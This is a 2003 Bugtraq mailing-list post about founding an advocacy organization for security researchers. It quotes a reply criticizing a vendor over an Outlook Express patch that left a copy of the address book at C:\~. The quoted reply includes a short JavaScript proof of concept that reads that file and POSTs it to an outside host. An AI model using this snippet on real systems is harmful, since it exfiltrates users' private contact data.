Bugtraq mailing list archives
Re: Security researchers organization
From: John C Borkowski III <borkowsj () spawar navy mil>
Date: Wed, 19 Nov 2003 08:55:09 -0500
I would like to see an organization that would do exactly that:
promote and protect the interests of security researchers
Something that at least in the United States, would act as a voice to the government to counter the claims of vendors. An "advocacy group", as it were. Probably with lobbyists to do the congressional work required to make out voices heard. Almost every group of like minded people and professionals has such an organization. An we researchers, with potentially so much to loose, have no such voice. I think the time has come to start one. - jcb3 On Tue, 2003-11-18 at 14:30, http-equiv () excite com wrote:
<!-- What I would like to see created is an organization that would promote and protect the interests of security researchers, plain and simple. There is currently no organization that exists solely to guide, help and represent security researchers on a larger scale, yet we can all recognize the need. --> I don't think those capable of actually doing research require hand holding by anyone. <!-- We are a wide, international and differing group of researchers, some with malicious and others with altruistic intents for finding security vulnerabilities. Despite our differences we have much in common - we are deeply interested in advancing our knowledge of security and information technology, we find vulnerabilities, we want the vendor to know about these at some point in time and we want to be accredited for our findings. --> Can this not already be achieved by following the minimum requirement of any one particular vendor. Or following any one of the number of so-called disclosure guidelines already tabled. While some may want accreditation and pat on the back, others may want the continual flow of effluent onto the internet to cease. Some want habitual offenders penalised. Monetarily. Some want an authoritative body like a UL or CSA or VDE or SEMKO or BS to stamp their mark on product entering the internet. 'REJECTED' for junk product that finds it's way repeatedly onto the internet. Allow me to give you an example of a habitual offender: There is a peculiar file that appears on almost everyone's computers since April of 2003. Peculiar enough in that all it is, is a tilde "~". Inside that file is the entire contents of the user's address book. In fact, the file is exactly that. The user's address book. Simply adding the extension of *.wab to it, opens up none other than the Windows Address Book. All names, addresses and whatever critically private information one puts in there. Some people even put their banking and credit card details in there believe it or not. This peculiar little file is an oddity created by the April 2003, Cumulative Patch for Outlook Express (330994). Now seven months ago. A most useful file in that it is created in a number of well known places including "C:\". Knowing the file name and location makes it quite easy to 'steal' this file and invade the privacy of the user of the computer where it still resides today. Some seven months after the vendor knowing full well about it. [I believe there is a pending lawsuit against the same vendor along the same lines at this time]. You see: var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "file:///C:/~",0); x.Send(); var y = new ActiveXObject ("Microsoft.XMLHTTP"); y.Open("POST", "http://www.malware.com/forthetaking.php", false); y.Send(x.responseBody); Will get and post that file. With a little bit of effort and timing, all one needs to do is steal that file and invade the privacy of the "customer" ! And who's fault will that be? Mine for providing this glaringly obvious scenario 'for free' or the vendor sitting on their hands for seven months thinking about it for a fee. REJECT ! the product and keep it off the internet !
Current thread:
- Security researchers organization Thor Larholm (Nov 18)
- Re: Security researchers organization Crispin Cowan (Nov 19)
- help needed with DotGNU security review (was Re: ..researchers org..) Norbert Bollow (Nov 21)
- Re: help needed with DotGNU security review (was Re: ..researchers org..) Crispin Cowan (Nov 22)
- help needed with DotGNU security review (was Re: ..researchers org..) Norbert Bollow (Nov 21)
- <Possible follow-ups>
- Re: Security researchers organization http-equiv () excite com (Nov 18)
- Re: Security researchers organization John C Borkowski III (Nov 19)
- Re: Security researchers organization Steven M. Christey (Nov 18)
- FW: Security researchers organization Keving Wong (Nov 18)
- RE: Security researchers organization Jeremy Epstein (Nov 19)
- Re: Security researchers organization Crispin Cowan (Nov 19)